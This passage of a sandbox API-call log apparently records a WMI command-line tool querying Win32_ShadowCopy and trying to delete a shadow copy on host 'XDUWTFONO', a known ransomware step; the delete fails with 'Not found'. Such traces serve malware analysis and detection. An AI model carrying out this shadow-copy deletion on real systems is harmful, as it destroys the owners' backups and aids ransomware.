pv=0x10f6d8) returned 0x0 [0051.406] malloc (_Size=0x18) returned 0x26c8d0 [0051.406] malloc (_Size=0x18) returned 0x26c930 [0051.406] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0051.406] free (_Block=0x26c8d0) [0051.406] IUnknown:Release (This=0x1d30a50) returned 0x0 [0051.407] free (_Block=0x26c9d0) [0051.407] ??1CHString@@QEAA@XZ () returned 0x49116601 [0051.407] ??1CHString@@QEAA@XZ () returned 0x7fef4a8482c [0051.407] free (_Block=0x26c8b0) [0051.407] ??1CHString@@QEAA@XZ () returned 0x7fef4a8482c [0051.407] lstrlenW (lpString="Shadow copy management.") returned 23 [0051.407] malloc (_Size=0x30) returned 0x268600 [0051.407] lstrlenW (lpString="Shadow copy management.") returned 23 [0051.407] free (_Block=0x26c930) [0051.407] IUnknown:Release (This=0x1d304e0) returned 0x0 [0051.407] free (_Block=0x26c8f0) [0051.407] ??1CHString@@QEAA@XZ () returned 0x7fef4a8482c [0051.407] lstrlenW (lpString="PATH") returned 4 [0051.407] lstrlenW (lpString="DELETE") returned 6 [0051.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0051.407] lstrlenW (lpString="WHERE") returned 5 [0051.407] lstrlenW (lpString="DELETE") returned 6 [0051.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0051.407] lstrlenW (lpString="(") returned 1 [0051.407] lstrlenW (lpString="DELETE") returned 6 [0051.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0051.407] lstrlenW (lpString="/") returned 1 [0051.407] lstrlenW (lpString="DELETE") returned 6 [0051.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0051.407] lstrlenW (lpString="-") returned 1 [0051.407] lstrlenW (lpString="DELETE") returned 6 [0051.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0051.407] malloc (_Size=0x18) returned 0x26c8f0 [0051.407] lstrlenW (lpString="GET") returned 3 [0051.408] lstrlenW (lpString="DELETE") returned 6 [0051.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0051.408] lstrlenW (lpString="LIST") returned 4 [0051.408] lstrlenW (lpString="DELETE") returned 6 [0051.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0051.408] lstrlenW (lpString="SET") returned 3 [0051.408] lstrlenW (lpString="DELETE") returned 6 [0051.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0051.408] lstrlenW (lpString="CREATE") returned 6 [0051.408] lstrlenW (lpString="DELETE") returned 6 [0051.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0051.408] lstrlenW (lpString="CALL") returned 4 [0051.408] lstrlenW (lpString="DELETE") returned 6 [0051.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0051.408] lstrlenW (lpString="ASSOC") returned 5 [0051.408] lstrlenW (lpString="DELETE") returned 6 [0051.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0051.408] lstrlenW (lpString="DELETE") returned 6 [0051.408] lstrlenW (lpString="DELETE") returned 6 [0051.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0051.408] free (_Block=0x26c8f0) [0051.408] lstrlenW (lpString="/") returned 1 [0051.408] lstrlenW (lpString="DELETE") returned 6 [0051.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0051.408] lstrlenW (lpString="-") returned 1 [0051.408] lstrlenW (lpString="DELETE") returned 6 [0051.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0051.408] lstrlenW (lpString="DELETE") returned 6 [0051.408] malloc (_Size=0xe) returned 0x26c8f0 [0051.408] lstrlenW (lpString="DELETE") returned 6 [0051.408] lstrlenW (lpString="GET") returned 3 [0051.408] lstrlenW (lpString="DELETE") returned 6 [0051.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0051.408] lstrlenW (lpString="LIST") returned 4 [0051.408] lstrlenW (lpString="DELETE") returned 6 [0051.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0051.408] lstrlenW (lpString="SET") returned 3 [0051.409] lstrlenW (lpString="DELETE") returned 6 [0051.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0051.409] lstrlenW (lpString="CREATE") returned 6 [0051.409] lstrlenW (lpString="DELETE") returned 6 [0051.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0051.409] lstrlenW (lpString="CALL") returned 4 [0051.409] lstrlenW (lpString="DELETE") returned 6 [0051.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0051.409] lstrlenW (lpString="ASSOC") returned 5 [0051.409] lstrlenW (lpString="DELETE") returned 6 [0051.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0051.409] lstrlenW (lpString="DELETE") returned 6 [0051.409] lstrlenW (lpString="DELETE") returned 6 [0051.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0051.409] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0051.409] malloc (_Size=0x3e) returned 0x26cac0 [0051.409] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0051.409] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff80 | out: _String="Select", _Context=0xffffffffffffff80) returned="Select" [0051.409] malloc (_Size=0x18) returned 0x26c930 [0051.409] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0051.409] lstrlenW (lpString="FROM") returned 4 [0051.409] lstrlenW (lpString="*") returned 1 [0051.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0051.409] malloc (_Size=0x18) returned 0x26c8b0 [0051.409] free (_Block=0x26c930) [0051.409] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x50003a00780008 | out: _String=0x0, _Context=0x50003a00780008) returned="from" [0051.409] lstrlenW (lpString="FROM") returned 4 [0051.409] lstrlenW (lpString="from") returned 4 [0051.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0051.409] malloc (_Size=0x18) returned 0x26c930 [0051.409] free (_Block=0x26c8b0) [0051.409] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x50003b00780008 | out: _String=0x0, _Context=0x50003b00780008) returned="Win32_ShadowCopy" [0051.410] malloc (_Size=0x18) returned 0x26c8b0 [0051.410] free (_Block=0x26c930) [0051.410] free (_Block=0x26cac0) [0051.410] free (_Block=0x26c8b0) [0051.410] lstrlenW (lpString="SET") returned 3 [0051.410] lstrlenW (lpString="DELETE") returned 6 [0051.410] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0051.410] lstrlenW (lpString="CREATE") returned 6 [0051.410] lstrlenW (lpString="DELETE") returned 6 [0051.410] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0051.410] free (_Block=0x26c7f0) [0051.410] malloc (_Size=0x8) returned 0x26cac0 [0051.410] lstrlenW (lpString="GET") returned 3 [0051.410] lstrlenW (lpString="DELETE") returned 6 [0051.410] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0051.410] lstrlenW (lpString="LIST") returned 4 [0051.410] lstrlenW (lpString="DELETE") returned 6 [0051.410] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0051.410] lstrlenW (lpString="ASSOC") returned 5 [0051.410] lstrlenW (lpString="DELETE") returned 6 [0051.410] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0051.410] WbemLocator:IUnknown:AddRef (This=0x1d11390) returned 0x3 [0051.410] free (_Block=0x40dfb0) [0051.410] lstrlenW (lpString="") returned 0 [0051.410] lstrlenW (lpString="XDUWTFONO") returned 9 [0051.410] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0051.410] lstrlenW (lpString="XDUWTFONO") returned 9 [0051.410] malloc (_Size=0x14) returned 0x26c7f0 [0051.410] lstrlenW (lpString="XDUWTFONO") returned 9 [0051.410] GetCurrentThreadId () returned 0x20c [0051.410] GetCurrentProcess () returned 0xffffffffffffffff [0051.410] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x10fa60 | out: TokenHandle=0x10fa60*=0x254) returned 1 [0051.410] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10fa58 | out: TokenInformation=0x0, ReturnLength=0x10fa58) returned 0 [0051.410] malloc (_Size=0x118) returned 0x26cae0 [0051.410] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0x3, TokenInformation=0x26cae0, TokenInformationLength=0x118, ReturnLength=0x10fa58 | out: TokenInformation=0x26cae0, ReturnLength=0x10fa58) returned 1 [0051.411] AdjustTokenPrivileges (in: TokenHandle=0x254, DisableAllPrivileges=0, NewState=0x26cae0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1997628853, Attributes=0x2b8d), (Luid.LowPart=0x0, Luid.HighPart=4251568, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=939524923, Attributes=0x2b9a), (Luid.LowPart=0x0, Luid.HighPart=2490712, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0051.411] free (_Block=0x26cae0) [0051.411] CloseHandle (hObject=0x254) returned 1 [0051.411] lstrlenW (lpString="GET") returned 3 [0051.411] lstrlenW (lpString="DELETE") returned 6 [0051.411] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0051.411] lstrlenW (lpString="LIST") returned 4 [0051.411] lstrlenW (lpString="DELETE") returned 6 [0051.411] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0051.411] lstrlenW (lpString="SET") returned 3 [0051.411] lstrlenW (lpString="DELETE") returned 6 [0051.411] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0051.411] lstrlenW (lpString="CALL") returned 4 [0051.411] lstrlenW (lpString="DELETE") returned 6 [0051.411] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0051.411] lstrlenW (lpString="ASSOC") returned 5 [0051.411] lstrlenW (lpString="DELETE") returned 6 [0051.411] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0051.411] lstrlenW (lpString="CREATE") returned 6 [0051.411] lstrlenW (lpString="DELETE") returned 6 [0051.411] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0051.411] lstrlenW (lpString="DELETE") returned 6 [0051.411] lstrlenW (lpString="DELETE") returned 6 [0051.411] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0051.412] malloc (_Size=0x18) returned 0x26c8b0 [0051.412] lstrlenA (lpString="") returned 0 [0051.412] malloc (_Size=0x2) returned 0x40dfb0 [0051.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff49314c, cbMultiByte=-1, lpWideCharStr=0x40dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0051.412] free (_Block=0x40dfb0) [0051.412] malloc (_Size=0x18) returned 0x26c930 [0051.412] lstrlenA (lpString="") returned 0 [0051.412] malloc (_Size=0x2) returned 0x40dfb0 [0051.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff49314c, cbMultiByte=-1, lpWideCharStr=0x40dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0051.412] free (_Block=0x40dfb0) [0051.413] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0051.413] malloc (_Size=0x3e) returned 0x26cae0 [0051.413] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0051.413] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff60 | out: _String="Select", _Context=0xffffffffffffff60) returned="Select" [0051.413] malloc (_Size=0x18) returned 0x26c9d0 [0051.413] free (_Block=0x26c930) [0051.413] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x50003f00680007 | out: _String=0x0, _Context=0x50003f00680007) returned="*" [0051.413] lstrlenW (lpString="FROM") returned 4 [0051.413] lstrlenW (lpString="*") returned 1 [0051.413] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0051.413] malloc (_Size=0x18) returned 0x26c930 [0051.413] free (_Block=0x26c9d0) [0051.413] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x50004000680007 | out: _String=0x0, _Context=0x50004000680007) returned="from" [0051.413] lstrlenW (lpString="FROM") returned 4 [0051.413] lstrlenW (lpString="from") returned 4 [0051.413] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0051.413] malloc (_Size=0x18) returned 0x26c9d0 [0051.413] free (_Block=0x26c930) [0051.413] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x50004100680007 | out: _String=0x0, _Context=0x50004100680007) returned="Win32_ShadowCopy" [0051.413] malloc (_Size=0x18) returned 0x26c930 [0051.413] free (_Block=0x26c9d0) [0051.413] free (_Block=0x26cae0) [0051.413] malloc (_Size=0x18) returned 0x26c9d0 [0051.413] malloc (_Size=0x18) returned 0x26c8d0 [0051.413] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0051.413] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0051.413] free (_Block=0x26c8b0) [0051.413] free (_Block=0x26c9d0) [0051.414] ??0CHString@@QEAA@XZ () returned 0x10f9d0 [0051.414] GetCurrentThreadId () returned 0x20c [0051.414] malloc (_Size=0x18) returned 0x26c9d0 [0051.414] malloc (_Size=0x18) returned 0x26c8b0 [0051.414] malloc (_Size=0x18) returned 0x26c950 [0051.414] malloc (_Size=0x18) returned 0x26c970 [0051.414] malloc (_Size=0x18) returned 0x26c990 [0051.414] SysStringLen (param_1="\\\\") returned 0x2 [0051.414] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0051.414] malloc (_Size=0x18) returned 0x26c9b0 [0051.414] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0051.414] SysStringLen (param_1="\\") returned 0x1 [0051.414] malloc (_Size=0x18) returned 0x26c9f0 [0051.414] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0051.414] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0051.414] free (_Block=0x26c9b0) [0051.414] free (_Block=0x26c990) [0051.414] free (_Block=0x26c970) [0051.414] free (_Block=0x26c950) [0051.414] free (_Block=0x26c8b0) [0051.414] free (_Block=0x26c9d0) [0051.414] malloc (_Size=0x18) returned 0x26c9d0 [0051.414] malloc (_Size=0x18) returned 0x26c8b0 [0051.414] malloc (_Size=0x18) returned 0x26c950 [0051.415] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d11390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff5029d0 | out: ppNamespace=0xff5029d0*=0x1d23c18) returned 0x0 [0051.450] free (_Block=0x26c950) [0051.450] free (_Block=0x26c8b0) [0051.450] free (_Block=0x26c9d0) [0051.450] CoSetProxyBlanket (pProxy=0x1d23c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0051.451] free (_Block=0x26c9f0) [0051.451] ??1CHString@@QEAA@XZ () returned 0x7fef4a8482c [0051.451] ??0CHString@@QEAA@XZ () returned 0x10f920 [0051.451] GetCurrentThreadId () returned 0x20c [0051.451] malloc (_Size=0x18) returned 0x26c9f0 [0051.451] lstrlenA (lpString="") returned 0 [0051.451] malloc (_Size=0x2) returned 0x40dfb0 [0051.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff49314c, cbMultiByte=-1, lpWideCharStr=0x40dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0051.451] free (_Block=0x40dfb0) [0051.451] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0051.451] SysStringLen (param_1="") returned 0x0 [0051.451] free (_Block=0x26c9f0) [0051.451] malloc (_Size=0x18) returned 0x26c9f0 [0051.451] IWbemServices:ExecQuery (in: This=0x1d23c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x10f928 | out: ppEnum=0x10f928*=0x1d23d18) returned 0x0 [0054.435] free (_Block=0x26c9f0) [0054.435] CoSetProxyBlanket (pProxy=0x1d23d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0054.438] IEnumWbemClassObject:Next (in: This=0x1d23d18, lTimeout=-1, uCount=0x1, apObjects=0x10f930, puReturned=0x10f940 | out: apObjects=0x10f930*=0x1d23d80, puReturned=0x10f940*=0x1) returned 0x0 [0054.439] malloc (_Size=0x18) returned 0x26c9f0 [0054.439] IWbemClassObject:Get (in: This=0x1d23d80, wszName="__PATH", lFlags=0, pVal=0x10f950*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f950*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0054.439] free (_Block=0x26c9f0) [0054.439] malloc (_Size=0x800) returned 0x26cae0 [0054.439] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x26cae0, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0054.440] FormatMessageW (in: dwFlags=0x2500, lpSource=0x26cae0, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x10f878, nSize=0x0, Arguments=0x10f888 | out: lpBuffer="넰:") returned 0x67 [0054.440] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0054.440] malloc (_Size=0x68) returned 0x26d2f0 [0054.440] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x26d2f0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0054.440] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff502ab0 [0054.440] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0054.442] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0054.442] free (_Block=0x26d2f0) [0054.442] free (_Block=0x26cae0) [0054.442] LocalFree (hMem=0x3ab130) returned 0x0 [0054.442] IWbemServices:DeleteInstance (in: This=0x1d23c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x80041002 [0059.574] _CxxThrowException () [0059.579] IUnknown:Release (This=0x1d23d18) returned 0x0 [0059.580] IUnknown:Release (This=0x1d23d80) returned 0x0 [0059.580] malloc (_Size=0x20) returned 0x26cae0 [0059.580] ??1CHString@@QEAA@XZ () returned 0x7fef4a8482c [0059.580] free (_Block=0x26c930) [0059.580] free (_Block=0x26c8d0) [0059.580] GetCurrentThreadId () returned 0x20c [0059.580] ??0CHString@@QEAA@PEBG@Z () returned 0x10fb08 [0059.580] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x10fb08 [0059.581] ??0CHString@@QEAA@XZ () returned 0x10f8a0 [0059.581] malloc (_Size=0x18) returned 0x26c8d0 [0059.581] malloc (_Size=0x18) returned 0x26c930 [0059.581] SysStringLen (param_1="") returned 0x0 [0059.581] free (_Block=0x26c8d0) [0059.581] CoCreateInstance (in: rclsid=0xff4973c0*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff497390*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0xff5029f8 | out: ppv=0xff5029f8*=0x1d11450) returned 0x0 [0059.584] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x1d11450, hRes=0x80041002, LocaleId=0x0, lFlags=0, MessageText=0x10f898 | out: MessageText=0x10f898*="Not found\r\n") returned 0x0 [0059.586] free (_Block=0x26c930) [0059.586] malloc (_Size=0x18) returned 0x26c930 [0059.587] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0x1d11450, hRes=0x80041002, LocaleId=0x0, lFlags=0, MessageText=0x10f890 | out: MessageText=0x10f890*="WMI") returned 0x0 [0059.588] malloc (_Size=0x18) returned 0x26c8d0 [0059.588] lstrlenW (lpString="WMI") returned 3 [0059.588] lstrlenW (lpString="Wbem") returned 4 [0059.588] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1 [0059.588] lstrlenW (lpString="WMI") returned 3 [0059.588] lstrlenW (lpString="WMI") returned 3 [0059.588] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2 [0059.588] WbemStatusCodeText:IUnknown:Release (This=0x1d11450) returned 0x0 [0059.588] ??1CHString@@QEAA@XZ () returned 0x7fef4a8482c [0059.588] LoadStringW (in: hInstance=0x0, uID=0xb7f3, lpBuffer=0x10f100, cchBufferMax=1024 | out: lpBuffer="ERROR:\r\nDescription = %1") returned 0x18 [0059.588] FormatMessageW (in: dwFlags=0x2500, lpSource=0x10f100, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x10f0d0, nSize=0x0, Arguments=0x10f0d8 | out: lpBuffer="㷰6") returned 0x21 [0059.588] malloc (_Size=0x18) returned 0x26c9f0 [0059.588] LocalFree (hMem=0x363df0) returned 0x0 [0059.588] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Not found\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0059.588] malloc (_Size=0x22) returned 0x26cb10 [0059.588] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Not found\r\n", cchWideChar=-1, lpMultiByteStr=0x26cb10, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR:\r\nDescription = Not found\r\n", lpUsedDefaultChar=0x0) returned 34 [0059.588] fprintf (in: _File=0x7fefdf72ae0, _Format="%s" | out: _File=0x7fefdf72ae0) returned 33 [0059.589] fflush (in: _File=0x7fefdf72ae0 | out: _File=0x7fefdf72ae0) returned 0 [0059.589] free (_Block=0x26cb10) [0059.590] free (_Block=0x26c9f0) [0059.590] free (_Block=0x26c8d0) [0059.590] free (_Block=0x26c930) [0059.590] ??1CHString@@QEAA@XZ () returned 0x49116601 [0059.590] ??0CHString@@QEAA@PEBG@Z () returned 0x10fb00 [0059.590] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x10fb00 [0059.590] GetCurrentThreadId () returned 0x20c [0059.590] ??1CHString@@QEAA@XZ () returned 0x49116601 [0059.590] WbemLocator:IUnknown:Release (This=0x1d23c18) returned 0x0 [0059.593] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4a8482c [0059.593] free (_Block=0x26cae0) [0059.593] _kbhit () returned 0x0 [0059.598] free (_Block=0x26cac0) [0059.598] free (_Block=0x26c7d0) [0059.598] free (_Block=0x26c7b0) [0059.598] free (_Block=0x26c790) [0059.598] free (_Block=0x26c770) [0059.598] free (_Block=0x266e70) [0059.598] free (_Block=0x26c870) [0059.598] free (_Block=0x268600) [0059.598] free (_Block=0x26c8f0) [0059.598] free (_Block=0x26ca40) [0059.598] free (_Block=0x26c890) [0059.598] free (_Block=0x26c910) [0059.598] free (_Block=0x266e00) [0059.598] free 